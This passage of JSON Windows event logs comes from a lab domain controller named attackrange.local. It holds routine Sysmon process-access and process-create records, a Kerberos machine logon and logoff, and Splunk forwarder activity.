C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3738,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3739,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3740,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3741,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.174\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-001050430500}\r\nTargetProcessId: 4224\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.174","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-001050430500}","TargetProcessId":"4224","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220398,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x5A7BD\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x5a7bd","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:55:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220399,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x5A7BD\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50087\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x5a7bd","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50087","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:55:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220400,"ProcessID":864,"ThreadID":3836,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x5A7BD\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x5a7bd","LogonType":"3","EventReceivedTime":"2020-08-01 07:55:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3742,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.454\r\nProcessGuid: {41C8662E-1FF8-5F25-0000-001073A70500}\r\nProcessId: 4292\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\" --scheme\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.454","ProcessGuid":"{41C8662E-1FF8-5F25-0000-001073A70500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\" --scheme","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3743,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:36.971\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF8-5F25-0000-001073A70500}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:36.971","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"4472","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF8-5F25-0000-001073A70500}","TargetProcessId":"4292","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program 